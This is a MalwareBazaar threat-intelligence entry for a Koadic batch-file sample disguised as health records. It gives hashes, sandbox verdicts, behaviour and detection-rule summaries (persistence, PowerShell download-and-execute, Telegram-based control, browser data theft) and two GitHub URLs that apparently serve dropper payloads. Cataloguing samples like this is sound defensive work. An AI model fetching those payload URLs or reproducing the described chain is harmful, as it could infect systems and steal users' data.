MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Koadic


Vendor detections: 10


Intelligence 10 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8
SHA3-384 hash: 8fdf6c742c2782a870acb3d04bce1b48a65a75c5c0b0a03d0850ffdfd3ebbd412df9bd880526fada76e0f229456e5874
SHA1 hash: c9606dc57258fbae6585b89ec200dc8ced3c727b
MD5 hash: dee7e3e1fc5aab5e926dd255f0e26683
humanhash: juliet-glucose-pizza-cat
File name:health-records-26153-x-ray-pdl.bat
Download: download sample
Signature Koadic
Create hunting rule
File size:3'833'483 bytes
First seen:2026-03-16 19:18:46 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/plain
ssdeep 3072:mSZx139tizBoRn+7qNnsHcs6nNFiKWOCwd8cIUpVTW4C3/RVjpDyd8vy6Bme/0vc:nq
TLSH T1600640442DBB5ECD288B4236D3274E11BDEAF63C687E2D19D57CB93E7D04A1E0084A76
Magika autohotkey
Reporter smica83
Tags:bat Koadic

Intelligence

File Origin
# of uploads :
1
# of downloads :
83
Origin country :
HU HU
Vendor Threat Intelligence
No detections
Malware family:
n/a
ID:
1
File name:
health-records-26153-x-ray-pdl.bat
Verdict:
Malicious activity
Analysis date:
2026-03-16 08:50:34 UTC
Tags:
github arch-doc python
Link:
https://app.any.run/tasks/906e0ca0-3abb-47c6-a851-1dedf02739ce

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/57667/
Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=69b7cdcf88c80c01586ab6cb
Tags:
obfuscated autorun shell sage
Result
Verdict:
Malware
Maliciousness:

Behaviour
Launching a process
Creating a file
Creating a file in the system32 directory
Running batch commands
Сreating synchronization primitives
Searching for synchronization primitives
DNS request
Connection attempt
Sending a custom TCP request
Sending an HTTP GET request
Creating a process from a recently created file
Moving a recently created file
Delayed reading of the file
Creating a process with a hidden window
Using the Windows Management Instrumentation requests
Reading critical registry keys
Searching for the window
Downloading the file
Launching a tool to kill processes
Launching a file downloaded from the Internet
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
cmd find findstr lolbin
Link:
https://www.filescan.io/uploads/69b857b6367b6bc6ee7e2290/reports/77d91f01-6153-434f-b7c2-40afef3db76a/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8
Verdict:
Malicious
File Type:
unknown
Link:
https://opentip.kaspersky.com/9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8/results?tab=lookup
Result
Threat name:
Koadic, Abobus Obfuscator
Create hunting rule
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1884509
Signature
Drops script or batch files to the startup folder
Excessive usage of taskkill to terminate processes
Found large BAT file
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Powershell drops PE file
Sigma detected: Curl Download And Execute Combination
Sigma detected: Drops script at startup location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses the Telegram API (likely for C&C communication)
Yara detected Abobus Obfuscator
Yara detected Koadic BAT payload
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1884509 Sample: health-records-26153-x-ray-... Startdate: 16/03/2026 Architecture: WINDOWS Score: 100 119 api.telegram.org 2->119 121 script.google.com 2->121 123 3 other IPs or domains 2->123 137 Malicious sample detected (through community Yara rule) 2->137 139 Yara detected Abobus Obfuscator 2->139 141 Sigma detected: Drops script at startup location 2->141 145 12 other signatures 2->145 11 cmd.exe 3 2->11         started        14 cmd.exe 1 2->14         started        16 svchost.exe 2->16         started        signatures3 143 Uses the Telegram API (likely for C&C communication) 119->143 process4 signatures5 159 Suspicious powershell command line found 11->159 161 Tries to download and execute files (via powershell) 11->161 18 powershell.exe 1006 11->18         started        22 powershell.exe 14 21 11->22         started        25 conhost.exe 11->25         started        33 9 other processes 11->33 27 cmd.exe 14->27         started        29 powershell.exe 3 12 14->29         started        31 net.exe 1 14->31         started        35 2 other processes 14->35 process6 dnsIp7 125 raw.githubusercontent.com 185.199.108.133, 443, 49694, 49695 FASTLYUS Netherlands 18->125 103 C:\Users\Public\Desktops\vcruntime140_1.dll, PE32+ 18->103 dropped 105 C:\Users\Public\Desktops\vcruntime140.dll, PE32+ 18->105 dropped 107 C:\Users\Public\Desktops\python312.dll, PE32+ 18->107 dropped 111 843 other files (108 malicious) 18->111 dropped 37 python.exe 18->37         started        41 conhost.exe 18->41         started        127 github.com 140.82.114.4, 443, 49692, 49693 GITHUBUS United States 22->127 109 C:\Users\user\AppData\...\WindowSecuryt.bat, Unicode 22->109 dropped 147 Drops script or batch files to the startup folder 22->147 149 Suspicious execution chain found 22->149 151 Powershell drops PE file 22->151 43 conhost.exe 22->43         started        153 Suspicious powershell command line found 27->153 45 powershell.exe 27->45         started        47 curl.exe 27->47         started        49 net.exe 27->49         started        55 2 other processes 27->55 51 cmd.exe 29->51         started        53 net1.exe 1 31->53         started        file8 signatures9 process10 dnsIp11 131 api.telegram.org 149.154.166.110, 443, 49716, 49717 TELEGRAMRU United Kingdom 37->131 133 script.google.com 142.251.210.46, 443, 49736 GOOGLEUS United States 37->133 135 ipinfo.io 34.117.59.81, 443, 49715 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 37->135 113 C:\Users\user\...\xlLJKr5bHNrAthXY.dll, PE32+ 37->113 dropped 115 C:\Users\user\...\Vb78Rx1Hbsz1v5hI.dll, PE32+ 37->115 dropped 57 cmd.exe 37->57         started        60 cmd.exe 37->60         started        62 cmd.exe 37->62         started        72 11 other processes 37->72 64 cmd.exe 45->64         started        117 C:\Users\user\AppData\Local\Temp\ut1s.bat, Unicode 47->117 dropped 66 net1.exe 49->66         started        68 cmd.exe 51->68         started        74 2 other processes 51->74 70 conhost.exe 55->70         started        file12 process13 signatures14 155 Excessive usage of taskkill to terminate processes 57->155 76 taskkill.exe 57->76         started        78 taskkill.exe 60->78         started        80 taskkill.exe 62->80         started        91 3 other processes 64->91 157 Suspicious powershell command line found 68->157 82 curl.exe 68->82         started        85 net.exe 68->85         started        87 powershell.exe 68->87         started        93 9 other processes 72->93 89 net1.exe 74->89         started        process15 dnsIp16 129 127.0.0.1 unknown unknown 82->129 95 net1.exe 85->95         started        97 conhost.exe 87->97         started        99 net1.exe 91->99         started        101 conhost.exe 91->101         started        process17
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8/
Verdict:
Malicious
Link:
https://tip.neiki.dev/file/9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=tn6vjxgd4c4zqhybkgd2xzaa2oeeziyapjsqfst53m3zeslo37ma._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
defense_evasion execution spyware stealer
Link:
https://tria.ge/reports/260316-x1na6aat7t/
Behaviour
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Contacts third-party web service commonly abused for C2
Looks up external IP address via web service
Drops startup file
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Malware Config
Dropper Extraction:
https://github.com/ud-6/ut326/raw/main/up-1s.png
https://github.com/mh1-7/t326/raw/main/Document.zip
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/57667/

Comments